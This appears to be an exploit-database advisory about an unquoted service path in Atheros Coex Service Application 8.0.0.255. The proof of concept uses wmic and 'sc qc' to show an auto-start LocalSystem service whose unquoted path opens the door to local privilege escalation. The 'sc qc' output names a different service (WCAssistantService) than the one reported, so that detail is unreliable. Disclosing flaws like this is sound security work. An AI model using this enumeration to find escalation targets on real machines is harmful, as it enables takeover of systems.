Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path

2020-11-16
ID: 103558
CVE: None
Download vulnerable application: None
#Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
#Exploit Author : Isabel Lopez
#Exploit Date: 2020-11-13
#Vendor Homepage : https://www.file.net/process/ath_coexagent.exe.html
#Link Software : https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx
#Tested on OS: Windows 8.1 (64bits)


# 1. Description
# Atheros Coex Service Application 8.0.0.255 has an unquoted service path.

# 2. PoC

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"

ZAtheros Bt&Wlan Coex Agent	ZAtheros Bt&Wlan Coex Agent	C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe    Auto

C:\>sc qc WCAssistantService
[SC] QueryServiceConfig SUCCES

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ZAtheros Bt&Wlan Coex Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
1-4-2 (www02)